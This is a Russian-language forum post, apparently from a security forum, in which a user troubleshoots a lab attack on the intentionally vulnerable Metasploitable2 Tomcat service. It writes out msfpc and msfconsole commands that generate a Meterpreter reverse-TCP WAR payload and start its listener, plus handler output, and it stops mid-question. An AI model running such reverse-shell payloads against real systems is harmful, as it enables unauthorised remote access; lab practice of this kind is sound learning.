Ковыряю древнюю машину Metasploitable2, а именно tomcat
Делаю нагрузку такой командой:
sudo msfpc Tomcat 192.168.146.148 4444 MSF REVERSE TCP
Делаю нагрузку такой командой:
sudo msfpc Tomcat 192.168.146.148 4444 MSF REVERSE TCP
Получаю два файла.
В кали запускаю: sudo msfconsole -q -r ‘/home/kali/tomcat-meterpreter-staged-reverse-tcp-4444-war.rc
на жертве запускаю нагрузку.
Кали пишет:
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.146.148:4444
Если на жертве пишу: nc -vz…
Форум информационной безопасности — Codeby.net
Ваша реакция?
+1
+1
+1
+1
+1
+1
+1